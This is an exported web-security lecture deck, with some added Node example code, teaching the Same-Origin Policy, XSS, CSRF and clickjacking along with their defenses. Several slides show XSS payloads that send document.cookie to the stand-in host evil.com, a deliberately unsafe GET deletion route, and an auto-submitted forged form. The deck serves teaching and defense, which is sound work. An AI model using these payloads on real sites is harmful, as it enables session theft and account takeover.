Slide 1

Slide 1 text

Selected Topics on Website Security
Concept of Same Origin Policy, XSS, CSRF & Clickjacking
MrOrz, 102-2 CCSP
Reference: 白帽子講 Web 安全 (White Hat Talks Web Security)

Slide 2

Slide 2 text

খࢿ҆શ޲લি
Concept of Same Origin Policy, XSS, CSRF & Clickjacking
MrOrz, 102-2 CCSP
Reference: 白帽子講 Web 安全 (White Hat Talks Web Security)

Slide 3

Slide 3 text

Same-Origin Policy

Slide 4

Slide 4 text

❝ The browser's most central and most basic security function… the Web is built on the foundation of the Same-Origin Policy. ❞ – 吳翰清

Slide 5

Slide 5 text

Every browser will:
• Same Origin: allow reading what is there
• Different Origin: refuse reading what is there

Slide 6

Slide 6 text

If there were no Same-Origin Policy:
• Same Origin: allow reading what is there
• Different Origin: allow reading what is there

Slide 7

Slide 7 text

If there were no Same-Origin Policy:
• Same Origin: allow reading what is there
• Different Origin: allow reading what is there

Upon visiting http://evil.mobile.org :

$.get('http://facebook.com', {}, function(data){
  // your Facebook wall, obtained without your permission
}, 'html');

Slide 8

Slide 8 text

An origin is defined by host, port & protocol: https://developer.mozilla.org/zh-TW/docs/JavaScript/Same_origin_policy_for_JavaScript
(table on the slide: examples of Same Origin vs. Different Origin URLs)

Slide 9

Slide 9 text

By default, reading data across domains is refused. The following are the exceptions.

Slide 10

Slide 10 text

Exception 1: tags that can load resources across domains
• <img>
• <iframe>
• <link>
JavaScript has no way to read or write their contents.

Slide 11

Slide 11 text

Exception 2: Cross-Origin Resource Sharing (CORS)
• Origin request header
• Access-Control-Allow-XXX response headers
• Enables cross-origin AJAX, web fonts, WebGL & canvas
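As an added example (not code from the original slides), the two ideas of slides 8 and 11 written out in Node: the protocol/host/port comparison that defines an origin, and the server-side half of the CORS exception built on top of it, which answers only origins on an explicit allow-list. The allow-list and all URLs are constructed for the example; no network access is needed.

```javascript
// Added example, not from the original slides. Runs under Node (CommonJS).

const DEFAULT_PORTS = { 'http:': '80', 'https:': '443' };

// Serialize a URL to its origin triple: protocol, host and port (slide 8).
// The WHATWG URL parser drops the port when it is the scheme default, so we
// restore it so that "http://a.test" and "http://a.test:80" compare equal.
function originOf(urlString) {
  const u = new URL(urlString);
  const port = u.port || DEFAULT_PORTS[u.protocol] || '';
  return `${u.protocol}//${u.hostname}:${port}`;
}

function isSameOrigin(a, b) {
  return originOf(a) === originOf(b);
}

// Constructed allow-list: origins whose scripts may read this server's responses.
const ALLOWED_ORIGINS = ['https://app.example.test', 'https://admin.example.test'];

// CORS response headers for a request carrying `Origin: <originHeader>`.
// Returns {} (no CORS headers, so the browser refuses the read) unless the
// origin is on the list. It never echoes an unknown Origin back: doing so
// with credentials would re-open exactly the cross-origin read the
// Same-Origin Policy closed.
function corsHeadersFor(originHeader, allowed = ALLOWED_ORIGINS) {
  if (!originHeader) return {};
  let incoming;
  try {
    incoming = originOf(originHeader);
  } catch (e) {
    return {}; // "null" or otherwise malformed Origin: treat as not allowed
  }
  if (!allowed.some((o) => originOf(o) === incoming)) return {};
  return {
    'Access-Control-Allow-Origin': originHeader,
    'Access-Control-Allow-Credentials': 'true',
    'Access-Control-Allow-Methods': 'GET, POST',
    'Access-Control-Allow-Headers': 'Content-Type',
    'Vary': 'Origin', // the response depends on Origin, so caches must key on it
  };
}

// Stand-alone demonstration.
console.log(isSameOrigin('http://a.test/x', 'http://a.test:80/y'));   // true
console.log(isSameOrigin('http://a.test', 'https://a.test'));          // false
console.log(corsHeadersFor('https://app.example.test'));               // headers
console.log(corsHeadersFor('https://evil.test'));                      // {}
```

A script on evil.test can still send the request (the browser does that regardless); what the empty header set denies is reading the response, which is the same boundary the slides describe for the Same-Origin Policy.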

Slide 12

Slide 12 text

Cross-Site Scripting (XSS)

Slide 13

Slide 13 text

❝ An attack in which a hacker tampers with a web page through "HTML injection", inserting a malicious script, and thereby takes control of the user's browser when the user views the page. ❞ – 吳翰清

Slide 14

Slide 14 text

Your site : Example #1

<%- user.desc %>   ← HTML entered by the user

Slide 15

Slide 15 text

Your site : Example #1 (rendered)

Hello

I am Johnson

Slide 16

Slide 16 text

Your site : Example #1

$.getJSON('http://evil.com/', { stoken: document.cookie });

Anyone who visits this user's page has their cookie stolen by evil.com.

Slide 17

Slide 17 text

Your site : Example #2

var pageTitle = "<%= userPage.title %>";   ← a string the user enters freely

Slide 18

Slide 18 text

Your site : Example #2

var pageTitle = ""; $.getJSON(...); "";

Anyone who visits this user's page has their data stolen.

Slide 19

Slide 19 text

Your site : Example #3

$.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){
  $('h1').html(data.userPageTitle);   // userPageTitle: a string the user enters freely
});

Rendered heading: Welcome to my page!

Slide 20

Slide 20 text

Your site : Example #3

$.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){
  $('h1').html(data.userPageTitle);   // userPageTitle: a string the user enters freely
});

Rendered heading: Welcome to my page!$.getJSON('http://evil.com',...);

Slide 21

Slide 21 text

❝ The demonstration case for this attack was cross-domain, which is why it was called "Cross" Site Scripting. Today, whether it crosses domains no longer matters, yet the name XSS has been kept all along. ❞ – 吳翰清

Slide 22

Slide 22 text

Defenses
Preventing cookie theft: HttpOnly

res.cookie('key', 'value', { httpOnly: true });

The default is actually already true.

Slide 24

Slide 24 text

Defenses
HTML output checking: avoid <%- %> wherever possible; use <%= user.desc %>

Slide 25

Slide 25 text

Defenses
HTML output checking: Caja-HTML-Sanitizer

// Controller
var sanitizer = require('sanitizer');
var sanitizedIntro = sanitizer.sanitize(user.desc);

<%- sanitizedIntro %>

Keeps the harmless HTML tags.

Slide 26

Slide 26 text

Defenses
JavaScript output checking: use the ready-made JSON.stringify

var page = <%- JSON.stringify({ title: userPage.title }) %>;

Slide 27

Slide 27 text

Defenses
DOM-based XSS: prefer .text(…) over .html(…), or sanitize the HTML you intend to insert first.

$.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){
  $('h1').text(data.userPageTitle);
});
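As an added example (not code from the original slides or from EJS), the output-encoding steps of slides 24 to 27 written out by hand so their effect on the Example #2 payload is visible: an HTML escaper of the kind <%= %> applies, and a JSON.stringify-based JavaScript literal as on slide 26, with two extra escapes for the cases a plain JSON.stringify leaves open. `new Function` is used only to show in Node what a browser would execute; the payload and titles are constructed for the example.

```javascript
// Added example, not from the original slides. Runs under Node.

// What an escaping template tag (<%= %>) does: neutralize the five characters
// that can start markup or end an attribute.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Slide 26's approach (JSON.stringify) plus two escapes it does not do:
// "</script>" inside a JSON string would still end the <script> block early,
// and U+2028/U+2029 are line terminators in JavaScript but not in JSON.
function toJsLiteral(value) {
  return JSON.stringify(value)
    .replace(/<\//g, '<\\/')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// The Example #2 line rendered the unsafe way (raw interpolation into a
// JavaScript string) and the safe way (a whole JSON literal).
function renderTitleScript(title) {
  return {
    unsafe: `var pageTitle = "${title}";`,
    safe: `var page = ${toJsLiteral({ title })};`,
  };
}

// Evaluate the safe line as a browser would and read the title back out.
function safeEmbedRoundTrip(title) {
  return new Function(renderTitleScript(title).safe + ' return page.title;')();
}

// Run a generated script with a stub `$` that records any getJSON call.
// Returns true when the title managed to call $.getJSON, i.e. the injection ran.
function injectionRan(script) {
  let called = false;
  const $ = { getJSON: () => { called = true; } };
  const document = { cookie: 'session=constructed-value' };
  try {
    new Function('$', 'document', script)($, document);
  } catch (e) {
    // a syntax error means the script did not run at all
  }
  return called;
}

// Constructed payload in the shape of the slides' Example #2.
const PAYLOAD = "\"; $.getJSON('http://evil.com/', { stoken: document.cookie }); \"";

console.log(escapeHtml('<script>'));                              // &lt;script&gt;
console.log(injectionRan(renderTitleScript(PAYLOAD).unsafe));     // true
console.log(injectionRan(renderTitleScript(PAYLOAD).safe));       // false
console.log(safeEmbedRoundTrip(PAYLOAD) === PAYLOAD);             // true
```

The round trip is the property to check: the safe rendering gives the page exactly the string the user typed, as data, while the unsafe one hands part of it to the JavaScript parser.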

Slide 28

Slide 28 text

Cross-Site Request Forgery (CSRF/XSRF)

Slide 29

Slide 29 text

Your site : Example #4

// Delete current user account
app.get('/user/delete', userCtrl.delete);

Slide 30

Slide 30 text

evil.com : Example #4

Anyone who visits this evil site sees the page shown, and then her/his account on yoursite.com is deleted for no apparent reason.

Slide 31

Slide 31 text

❝ Merely by luring the user into visiting a page, the attacker has performed an operation on yoursite.com in that user's identity… This request is forged by the attacker, hence the name "Cross-site Request Forgery". ❞ – 吳翰清

Slide 32

Slide 32 text

Demo: cryptogasm.com/gmail-logout.html

Slide 33

Slide 33 text

evil.com : Example #5

After visiting the evil site, the user's account on yoursite.com is deleted for no apparent reason.

$('#evil-form').submit();

Slide 34

Slide 34 text

Defenses
• What makes a CSRF attack succeed: every parameter of the request can be guessed by the attacker.
• Anti-CSRF token: makes it impossible for the attacker to assemble a correct request.

Slide 35

Slide 35 text

Defenses

Slide 36

Slide 36 text

Defenses

Slide 37

Slide 37 text

Defenses
After the form is submitted, the back-end controller checks whether the form's token matches the token in the cookie; if they differ, it does nothing.

Slide 38

Slide 38 text

Defenses
http://stackoverflow.com/questions/20420762/how-to-enable-csrf-in-express3

// Express settings

app.use(express.cookieParser('optional secret string'));
app.use(express.session());
app.use(express.csrf());
app.use(function (req, res, next) {
  res.locals.csrftoken = req.csrfToken();
  next();
});

Makes the anti-CSRF token from the session readable in the view as well.

Slide 39

Slide 39 text

Clickjacking

Slide 40

Slide 40 text

Jeremiah Grossman and Robert Hansen, 2008

Slide 41

Slide 41 text

http://www.crazylearner.org/clickjacking-example/ Copyright 2014 Crazylearner. Fair use

Slide 43

Slide 43 text

Defenses
• Keep your site from being stuffed into an iframe
• x-frame-options: deny
• https://github.com/evilpacket/helmet
Can't be your site!

Slide 44

Slide 44 text

http://youtu.be/VRCUpXLguHM
吳翰清 著 (written by Wu Hanqing)
